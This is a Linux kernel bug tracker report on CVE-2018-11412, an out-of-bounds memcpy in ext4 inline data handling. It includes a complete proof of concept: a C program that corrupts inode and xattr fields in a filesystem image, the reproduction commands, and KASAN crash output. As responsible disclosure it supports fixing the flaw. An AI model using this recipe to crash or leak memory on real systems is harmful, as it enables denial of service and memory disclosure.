Bug 199803

Summary: out-of-bounds memcpy via non-inline system.data xattr
Product: File System
Reporter: Jann Horn (Google) (jannh)
Component: ext4
Assignee: fs_ext4 (fs_ext4)
Status: NEW ---
Severity: normal
CC: carnil
Priority: P1
Hardware: All
OS: Linux
Kernel Version: v4.17-rc4+
Subsystem:
Regression: No
Bisected commit-id:

Description Jann Horn (Google) 2018-05-22 17:53:13 UTC
ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".

Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.

When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.



ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.

Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:

    memcpy(buffer,
           (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);



To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:

1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:

    $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
    mke2fs 1.43.7 (16-Oct-2017)
    Creating regular file testfs.img

    Filesystem too small for a journal
    Creating filesystem with 100 4k blocks and 64 inodes

    Allocating group tables: done
    Writing inode tables: done
    Writing superblocks and filesystem accounting information: done

2. Create a 75-byte file in the new filesystem:

    $ mkdir mount
    $ sudo mount testfs.img mount
    $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
    1+0 records in
    1+0 records out
    75 bytes copied, 0.000811554 s, 92.4 kB/s
    $ sudo umount mount

3. Bump up the file size recorded in the inode (i_size_lo), bump up the xattr
   value size, and mark the xattr value as non-inline (stored in inode 20):

    $ cat fixup.c
    #include <stdint.h>
    #include <fcntl.h>
    #include <err.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <sys/stat.h>

    /*
     * Map the kernel-style fixed-width type names used by the struct
     * definitions below onto the <stdint.h> types. No byte swapping is
     * attached to the "le" names: fields are accessed in host byte order.
     */
    #define __le16 uint16_t
    #define __le32 uint32_t
    #define __u16 uint16_t
    #define __u32 uint32_t
    #define __u8 uint8_t

    /*
     * Some definitions from kernel headers.
     *
     * EXT4_N_BLOCKS evaluates to 15 (12 + 1 + 1 + 1) and sizes the i_block[]
     * array in struct ext4_inode, i.e. 60 bytes of __le32 slots.
     * EXT4_XATTR_MAGIC is the value main() expects in the h_magic field of
     * the in-inode xattr header.
     */
    #define EXT4_NDIR_BLOCKS    12
    #define EXT4_IND_BLOCK      EXT4_NDIR_BLOCKS
    #define EXT4_DIND_BLOCK     (EXT4_IND_BLOCK + 1)
    #define EXT4_TIND_BLOCK     (EXT4_DIND_BLOCK + 1)
    #define EXT4_N_BLOCKS       (EXT4_TIND_BLOCK + 1)
    #define EXT4_XATTR_MAGIC    0xEA020000
    /*
     * Layout of an inode as this tool overlays it on the raw image bytes.
     *
     * The fields up to and including osd2 occupy 128 bytes; the fields from
     * i_extra_isize onwards bring the struct to 160 bytes. main() only uses
     * i_mode, i_size_lo, i_links_count and i_extra_isize; the remaining
     * fields exist to keep the offsets right, so the field order and widths
     * must not be changed.
     */
    struct ext4_inode {
      __le16  i_mode;         /* printed in octal by main() */
      __le16  i_uid;
      __le32  i_size_lo;      /* matched against 75, then overwritten with 60000 */
      __le32  i_atime;
      __le32  i_ctime;
      __le32  i_mtime;
      __le32  i_dtime;
      __le16  i_gid;
      __le16  i_links_count;  /* matched against 1 to pick the target inode */
      __le32  i_blocks_lo;
      __le32  i_flags;
      union {
        struct {
          __le32  l_i_version;
        } linux1;
      } osd1;
      __le32  i_block[EXT4_N_BLOCKS];  /* 60 bytes */
      __le32  i_generation;
      __le32  i_file_acl_lo;
      __le32  i_size_high;
      __le32  i_obso_faddr;
      union {
        struct {
          __le16  l_i_blocks_high;
          __le16  l_i_file_acl_high;
          __le16  l_i_uid_high;
          __le16  l_i_gid_high;
          __le16  l_i_checksum_lo;
          __le16  l_i_reserved;
        } linux2;
      } osd2;
      /* Byte offset 128: main() looks for the xattr header at 128 + i_extra_isize. */
      __le16  i_extra_isize;
      __le16  i_checksum_hi;
      __le32  i_ctime_extra;
      __le32  i_mtime_extra;
      __le32  i_atime_extra;
      __le32  i_crtime;
      __le32  i_crtime_extra;
      __le32  i_version_hi;
      __le32  i_projid;
    };
    /*
     * Header that precedes the in-inode xattr entries. main() reads it at
     * byte offset 128 + i_extra_isize inside the inode and treats the first
     * entry as starting immediately after it.
     */
    struct ext4_xattr_ibody_header {
      __le32  h_magic;  /* compared against EXT4_XATTR_MAGIC */
    };
    /*
     * One extended attribute entry as stored in the inode body.
     *
     * The fixed part is 16 bytes and is followed directly by the attribute
     * name. main() steps to the next entry by skipping the fixed part plus
     * e_name_len rounded up to a multiple of 4, and treats an entry whose
     * first four bytes are zero as the end of the list.
     */
    struct ext4_xattr_entry {
      __u8  e_name_len;      /* length of e_name in bytes */
      __u8  e_name_index;    /* printed as "idx"; 7 for the "data" entry in the example run */
      __le16  e_value_offs;  /* offset of an inline value */
      __le32  e_value_inum;  /* non-zero: value lives in this dedicated inode */
      __le32  e_value_size;  /* value length in bytes */
      __le32  e_hash;        /* not used by this tool */
      char  e_name[];        /* e_name_len bytes, no terminator stored here */
    };

    #define INODE_SIZE 256

    #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )

    int main(int argc, char **argv) {
      char *path = argv[1];
      int fd = open(path, O_RDWR);
      if (fd == -1) err(1, "open");
      struct stat st;
      if (fstat(fd, &st)) err(1, "fstat");
      char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE,
MAP_SHARED, fd, 0);
      if (map == MAP_FAILED) err(1, "mmap");
      for (int i=0; i<st.st_size/INODE_SIZE; i++) {
        struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
        if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
        printf("found inode (idx=%d, size=%u, mode=%ho)\n",
               i, ino->i_size_lo, ino->i_mode);
        ino->i_size_lo = 60000;
        printf("  i_extra_isize = %hu\n", ino->i_extra_isize);
        struct ext4_xattr_ibody_header *hdr =
            (void*)( ((char*)ino)+128+ino->i_extra_isize );
        if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
        struct ext4_xattr_entry *entry = (void*)(hdr+1);
        while (*(uint32_t*)entry != 0) {
          printf("  attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
              entry->e_name_index, entry->e_name_len, entry->e_name,
              entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
          entry->e_value_offs = 0;
          entry->e_value_inum = 20;
          entry->e_value_size = 60000;
          entry = (void*)(
              (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
          );
        }
      }
    }
    $ gcc -o fixup fixup.c -Wall
    $ ./fixup testfs.img
    found inode (idx=555, size=75, mode=100644)
      i_extra_isize = 32
      attr: idx=7 name='data' offs=76 inum=0 size=15

4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):

    $ fsck.ext4 -f testfs.img
    e2fsck 1.43.7 (16-Oct-2017)
    Pass 1: Checking inodes, blocks, and sizes
    Inode 12 has INLINE_DATA_FL flag but extended attribute not found.  Truncate<y>? no
    Extended attribute in inode 12 has a value size (60000) which is invalid
    Clear<y>? no
    Inode 12 passes checks, but checksum does not match inode.  Fix<y>? yes
    Pass 2: Checking directory structure
    Pass 3: Checking directory connectivity
    Pass 4: Checking reference counts
    Pass 5: Checking group summary information

    testfs.img: ***** FILE SYSTEM WAS MODIFIED *****

    testfs.img: ********** WARNING: Filesystem still has errors **********

    testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks

5. Mount the filesystem again:

    $ sudo mount testfs.img mount

6. Read the file:

    $ hexdump -C mount/testfile
    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 04 07 00 00  |................|
    00000040  14 00 00 00 60 ea 00 00  00 00 00 00 64 61 74 61  |....`.......data|
    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    000004a0  31 00 00 00 00 00 00 00  e0 d1 fc 98 d7 7f 00 00  |1...............|
    000004b0  e0 07 03 99 d7 7f 00 00  00 00 00 00 00 00 00 00  |................|
    000004c0  00 00 00 00 00 00 00 00  e0 5f 00 00 00 00 00 00  |........._......|
    000004d0  64 00 00 00 00 00 00 00  f0 af 02 99 d7 7f 00 00  |d...............|
    000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    [...]

7. Check dmesg:

    $ dmesg
    [...]
    [ 3211.552729] ==================================================================
    [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922

    [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
    [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
    [ 3211.552799] Call Trace:
    [ 3211.552807]  dump_stack+0x71/0xab
    [ 3211.552813]  print_address_description+0x6a/0x250
    [ 3211.552817]  kasan_report+0x258/0x380
    [ 3211.552863]  ? ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552867]  memcpy+0x34/0x50
    [ 3211.552914]  ext4_read_inline_data+0x114/0x120 [ext4]
    [ 3211.552961]  ext4_read_inline_page+0x1e4/0x2a0 [ext4]
    [ 3211.553006]  ? ext4_read_inline_data+0x120/0x120 [ext4]
    [ 3211.553053]  ext4_readpage_inline+0x13e/0x160 [ext4]
    [ 3211.553101]  ext4_readpage+0xf5/0x110 [ext4]
    [ 3211.553106]  generic_file_read_iter+0x9a4/0xea0
    [ 3211.553112]  ? filemap_range_has_page+0x160/0x160
    [ 3211.553116]  ? save_stack+0x89/0xb0
    [ 3211.553120]  ? __kasan_slab_free+0x105/0x150
    [ 3211.553124]  ? aa_path_link+0x1f0/0x1f0
    [ 3211.553128]  ? do_syscall_64+0x150/0x160
    [ 3211.553132]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553137]  ? audit_watch_compare+0x1b/0x50
    [ 3211.553142]  __vfs_read+0x239/0x340
    [ 3211.553145]  ? __x64_sys_copy_file_range+0x2d0/0x2d0
    [ 3211.553149]  ? dput.part.19+0x2e/0x1b0
    [ 3211.553154]  ? auditd_test_task+0x43/0x60
    [ 3211.553158]  vfs_read+0xa5/0x190
    [ 3211.553162]  ksys_read+0xa1/0x120
    [ 3211.553166]  ? kernel_write+0xa0/0xa0
    [ 3211.553171]  do_syscall_64+0x6d/0x160
    [ 3211.553175]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 3211.553178] RIP: 0033:0x7f9ada1af72c
    [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
    [...]
    [ 3211.553197] The buggy address belongs to the page:
    [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
    [ 3211.553207] flags: 0x17fffc000000021(locked|lru)
    [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
    [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
    [ 3211.553222] page dumped because: kasan: bad access detected
    [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0

    [ 3211.553229] Memory state around the buggy address:
    [ 3211.553234]  ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 3211.553238]  ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553246]                    ^
    [ 3211.553250]  ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553254]  ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 3211.553257] ==================================================================

Occasionally this will also cause unrelated userspace processes to segfault.
Comment 1 Salvatore Bonaccorso 2018-05-24 19:53:27 UTC
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412 was assigned for this issue by MITRE.